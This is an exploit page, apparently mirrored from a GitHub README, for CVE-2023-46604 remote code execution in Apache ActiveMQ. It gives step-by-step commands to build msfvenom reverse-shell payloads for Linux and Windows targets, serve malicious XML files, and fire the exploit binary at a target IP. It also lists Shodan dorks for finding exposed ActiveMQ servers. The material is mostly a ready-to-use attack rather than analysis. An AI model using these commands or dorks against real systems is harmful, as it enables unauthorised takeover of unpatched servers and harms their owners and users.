## https://sploitus.com/exploit?id=D1A6E22C-FE78-53F8-AC35-8B11AD6D5EAD
# CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ
This exploit builds upon the foundational work available at https://github.com/X1cT34m (https://github.com/X1r0z/ActiveMQ-RCE). We have further developed the technique to achieve a reverse shell utilizing the Metasploit Framework (https://github.com/rapid7/metasploit-framework).
# Usage:
<b>Important: Manually change the IP Address (0.0.0.0 on line 11) in the XML files with the IP Address where the payload will be generated. If u follow the below commands it will be your Listner IP Addess. Also {IP_Of_Hosted_XML_File} will be your Listner IP Address.</b>
For Linux/Unix Targets
```
git clone https://github.com/SaumyajeetDas/CVE-2023-46604-RCE-Reverse-Shell
cd CVE-2023-46604-RCE-Reverse-Shell
msfvenom -p linux/x64/shell_reverse_tcp LHOST={Your_Listener_IP/Host} LPORT={Your_Listener_Port} -f elf -o test.elf
python3 -m http.server 8001
./ActiveMQ-RCE -i {Target_IP} -u http://{IP_Of_Hosted_XML_File}:8001/poc-linux.xml
```
For Windows Targets
```
git clone https://github.com/SaumyajeetDas/CVE-2023-46604-RCE-Reverse-Shell
cd CVE-2023-46604-RCE-Reverse-Shell
msfvenom -p windows/x64/shell_reverse_tcp LHOST={Your_Listener_IP/Host} LPORT={Your_Listener_Port} -f eXE -o test.exe
python3 -m http.server 8001
./ActiveMQ-RCE -i {Target_IP} -u http://{IP_Of_Hosted_XML_File}:8001/poc-windows.xml
```
![image](https://github.com/SaumyajeetDas/CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ/assets/66937297/db1b82e4-55ef-4f23-9df7-8a0cf99c01c4)
# Shodan Dork:
- product:"ActiveMQ OpenWire Transport"
- ![image](https://github.com/SaumyajeetDas/CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ/assets/66937297/6d560881-7855-474b-8c8b-3fb5a3f09a94)
- product:"ActiveMQ OpenWire Transport" port:61616
- ![image](https://github.com/SaumyajeetDas/CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ/assets/66937297/1e073ec0-690e-40b1-bcc0-cb9390ca6b7c)
# Original Work:
- https://github.com/X1r0z/ActiveMQ-RCE
# For More Reading:
- https://www.rapid7.com/blog/post/2023/11/01/etr-suspected-exploitation-of-apache-activemq-cve-2023-46604/
- https://exp10it.cn/2023/10/apache-activemq-%E7%89%88%E6%9C%AC-5.18.3-rce-%E5%88%86%E6%9E%90/
- https://attackerkb.com/topics/IHsgZDE3tS/cve-2023-46604/rapid7-analysis
A special thanks to https://github.com/Anon4mous for actively supporting me.